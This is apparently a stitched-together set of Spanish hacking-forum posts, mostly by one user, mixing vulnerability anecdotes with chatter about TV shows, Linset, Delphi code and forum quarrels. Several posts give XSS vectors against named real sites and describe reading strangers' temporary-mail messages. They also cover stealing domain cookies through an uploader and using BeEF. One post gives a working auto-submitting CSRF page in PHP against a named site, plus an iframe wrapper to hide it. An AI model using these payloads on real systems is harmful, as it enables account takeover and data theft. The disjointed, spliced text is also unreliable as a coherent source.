Es normal que si empiezas a llenar la ram todo el rato y siga y siga, deje de responder el ordenador, igual que cuando haces un bucle infinito en php seguramente te colapse el navegador.

Es algo lógico es como si me pongo a darte puñetazos infinitamente en algun momento te caeras.
O como cuando realizan un ataque ddos si el servidor no deja de recibir muchas peticiones en breve tiempo en algun momento caera.

Bueno, estaba algo disgustado con pccomponentes y me fije en las afiliaciones.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
La cual utilizaremos para logear a effiliation y para registrarnos.


Bueno, sabia que esto estaba vinculado a una web francesa de afiliaciones, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Entonces dije bien no pasa nada de nombre y descripción pondre un simple vector en xss, "><img src=x onerror=prompt(2)>

Pondre un correo temporal usare No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y listo , por si hace falta confirmar algo.

Me encuentro que email temporal si recibe un correo con un vector xss , pum te lo ejecuta y ya..
En este caso no solo es por el vector si no porque el contenido se envia como html y nada ejecuta el html del correo, pero esto no es lo grave aunque en parte si

(Podemos detectar si se usa emailtemporal por su extension, y siempre que se use añadir un pequeño poc de redirección para obtener datos y infinitas cosas a el usuario que utilize ese correo asi que ya no es tonteria.)

Lo más grave de emailtemporal vendra luego..

Bueno algo que me encuentro de "camino" como aquel que dice, volvamos a effilation pero claro una vez me logeo con el nombre de usuario, NO mi nombre que es un vector xss, pues effiliation me refleja el xss cada vez que recargo la web, comente algo, haga lo que haga, a todos les reflejare mi XSS.



Si puse elladodelmal como sitio web a modo troll.

Tambien nos damos cuenta que en la  dirección de reenvío por omisión, si colocamos un vector xss tambien los ejecutara, oh my god esta web no filtrada nada(?).


Sisi, ni siquiera cuando colocas la contraseña nueva te la pone en asteriscos, ni siquiera eso..

Tambien obtenemos un CSRF en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para toda la gente que tenga cuenta en ella y este iniciada como ya sabeis con un CSRF podemos cambiar la clave, debido a que cuando realizas la petición no lleva ningun token, ni siquiera te pide que pongas la contraseña actual.

Tengo ganas de dormir y no e echo el poc, pero vamos que se hace en menos de 5 minutos, y si alguien lo quiere puedo hacerlo.

Que guay es una web donde se gana dinero por afiliaciones, pero nada aqui cualquiera puede usurpar la cuenta de cualquiera..

Claro podemos usurpar la cuenta, o directamente meterle un XSS en el dirección de reenvió por omisión y hacer uso de BEEF, no se que seria peor no?.


Está bastante claro que no ofrece protección alguna a los clientes , aparte de tener repleto de XSS Y CSRF, pudiendo cambiar tambien la cuenta bancaria y demas donde recibir el dinero..


Y voy a parar... porque me estoy empezando a cabrear  bastante, y no quiero hacer nada malo

Pero espera, emailtemporal  si tiene un xss seguro hay algo más, que petición hace cada vez que abro un mensaje?



Si efectivamente dicen borrar todos los mensajes, y demas , si quizas los borren pero tardaran bastante pues tengo más de 1954227 mensajes que puedo mirar ahora mismo, y siguiendo.. debido a una falta de verificación y si nos deja utilizar la acción de ver mensajes, tambien nos deja utilizar otras acciones y hay lo dejo.

Hasta aqui hemos llegado y espero que les haya gustado esta pequeña anecdota que de seguir seguro nunca acabaria.

PD: Al reportar ahora a emailtemporal, en el contacto si nos fijamos podemos bombardearle el contacto con el mismo mensaje todo el rato, pues se envia y no te muestra ningun captcha en ningun momento y puedes enviarlo las veces que quieras.

Bueno aunque no es nada importante, mientras miraba unas cosas me lo vi y aqui lo dejo, y bueno el host es bastante util.


Vector: "<h1 onclick=alert("Matabarras")>

Reportado: Al correo de paypal de donaciones.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Excelente serie. Hace 2 dias acabe de verla, a mi me gusto. Para entenderla hay que verla desde el principio.

Estoy a la espera de la segunda temporada que creo que sale en julio.

Enviado desde mi SGH-M919 mediante Tapatalk

Yo ya la he visto ahora en 2 dias y esta bastante bien, aunque algo paranoica y confusa, ojala salga en julio la 2.

Les dejo aqui un manual que hizo Okol, hace unos años ya, para strikegeek que era un blog de sanko y mio pero que por  x motivos se dejo, no se si okol lo público alguna vez.



Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si el nombre es test.pdf, no recuerdo el porque lo tengo así en un disco duro 

Voy a verla, pinta bien, y les dejo otra aunque no tenga que ver con la informática pero si con la magia y ami me encanta.
The Magicians. 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Desgraciadamente no puedo ayudarte a como montar el exploit debido a mi falta de inglés, yo tampoco he conseguido montarlo por que las instrucciones al ser traducidas por Google pierden un poco la lógica y se hacen dificil de entender, alguien debería hacer un post específico sobre como montarlo, si consigo más información será trasmitida por este post.

Habia que poner los dos comandos que te pone:
nasm -fwin32 IATLess.asm
link /subsystem:windows /entry:start IATLess.obj

Guardando antes en asm, el exploit( No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ) como nombre IATLess.asm

Igualmente el autor ya ha puesto en la web el compilado,gracias por compartir.
Puesto es mejor compilarlo uno mismo, si no quieres que cuando lo pruebes se guarde en c:\windows\virus.exe por ejemplo xD

Que va, empeze hace una semana en esto ahora descubri el havij.

Quería comprar un móvil y ..


Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Reportado? Si
La encontre el 15 de marzo,pero al fin hoy vi que lo arreglaron.
Fixeado? Si.

Agradecimiento? No 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra 

Mmm... mala porque? Ahí si que me pillas

Basicamente como ya paso en más sitios donde reporte vulnerabilidades en ese caso fue una Cross site Scripting, gracias a una xss en un uploader , resumiendo  podia subir archivos con extensión inventada (.test) cuando accedias a ellos se ejecutaban como html, por lo tanto lo que hice fue redirigir el mismo sitio para robarle las cookies del DOMINIO, entonces obtenia la del foro smf , que era el dominio principal. Si el uploader no hubiera sido un subdominio, en ningun momento hubiera tenido acceso a las cookies del dominio principal que en este caso eran SMF.

Ahora me pillas tú?

Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra 

Url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

<?php
//Codded: Matabarras
$url = "scanner.underc0de.org"; //url
//Parametros post que modificaremos :D
$form["password"] = ""; //Dejamos el valor así debido a por defecto ya coge el valor del pwd.
$form["email"] = "[email protected]"; //cambiamos el correo por el que queramos
$form["fname"] = "meaburro"; //nombre
$form["lname"] = "vayavaya"; //apellidos
$form["newsletter"] = 0; //recibimos noticias 0 deshabilitado, 1 habilitado
$form["doupdate"] = "";
$form["processUser"] = 1;





echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/ajax/controller.php" method="POST">';
foreach($form As $key=>$value) {
	echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>

Camuflar el csrf, easy.

// This code was coded by FrenetikK & Matabarras.


function writeIf(url) {
	document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}

writeIf('http://127.0.0.1/csrf.php');

Index

<script src="a.js"></script>

Soluciones:

- Solución fácil desactivar que se tome por si la contraseña.
- Solución fácil utilizar un catpcha decente como recaptcha.
-Solución fácil utilizar un referer(esto aun así seria bypasseable).
-Solución correcta, utilizar un token para cada cuenta y para cada petición.

Reportado? Si
Fixeado? Si pero no adecuadamente.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola tengo el siguiente problema con LINSET..



No me detecta la placa de red wifi USB.. Pero al ingresar airmon-ng figura normalmente..

Alguna solución? Gracias.

Entonces ya es cosa de Linset que no reconoce tu tarjeta de red, yo usando la alfa rtl8187 me la detectaba bien, cosas que suelen pasar.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
miren, volvió mr. traidor

el señor que spamea en el foro, mete púa en el twitter y con un foro fracasado.

Bienvenido!

Hola no se quien eres, un wannabes más supongo, y fanatico que sigue mi twitter y el de snifer, y no tengo foro propio, pero si participaba uno que cualquiera de los dos que administraba conmigo, tendrias que besarle los pies para que te enseñaran algo de programación(?)
Bienvenido(?) quien dice que vaya a participar por el foro, solo salude a algunos, en los que no te encuentras tú fan mio. 

Hola! que tal todos, espero que bien les sigo leyendo siempre 

Aqui el de metal_kingdom , solo es abrirlo y se guarda solo.

program anotator;
 
var
  S: textfile;
 
begin
  AssignFile(S, 'func.txt');
{$I-} // No mostramos errores I/O para evitar msgboxes innecesarios.
  append(S); // intentamos escribir en fichero existente.
{$I+} // Vemos errores para comprobarlos
  if IOResult <> 0 then // [0 = Fue bien] Si el resultado no fue bueno al comprobar entonces ..
    rewrite(S); // si no se pudo entonces creamos archivo.
  WriteLn(S, paramstr(0)); // escribimos ruta completa del archivo en nueva línea.
  closefile(S); // cerramos archivo.
end.

Aqui el que hice yo ya hace, lo hice para que se anotara al cliquear.

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls;

type
  TForm1 = class(TForm)
    boton: TButton;
    procedure botonClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
  myFile : TextFile;
  text   : string;
  sFileName : string;
implementation

{$R *.dfm}

procedure TForm1.botonClick(Sender: TObject);
begin
sFileName:= ExtractFileName(Application.ExeName);



   AssignFile(myFile, 'Funcionales.txt');
   Append(myFile);

   WriteLn(myFile, sFileName);

   CloseFile(myFile);

   Reset(myFile);

   CloseFile(myFile);
 end;

procedure TForm1.FormCreate(Sender: TObject);
begin
    AssignFile(myFile, 'Funcionales.txt');
    ReWrite(myFile);
    CloseFile(myFile);
end;

end.

El codigo de metal_kingdom  es más corto,  y mejor.

Simplemente este post es una excusa para saludarles y espero que les vaya todo bien, saludos! 

Ten en cuenta una cosa, la mayoria de scripts de antes, ya no corren en terminal bien con python 3 da bastantes errores de compatibilidad y movidas así.

Yo en manjaro para la mayoria de cosas que tengo en py , tengo que usar el comando python2 , que equivale a la versión 2 (o 2.7 (?) ) no lo se seguro, para que esten compatibles 

Voto por snifer, el nacio troll 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Ya no furula para ello puedes hacer uso de pwcrypt de SBD, la cual ya fue liberada lo unico que necesitas es tener la cuenta de gmail o xXX que fue casada con la creación de whatsapp y listo!.

Regards,
Snifer

Exacto después de las ultimas actualizaciones jodieron xD

Sysanalizer, de los mejores o Systracer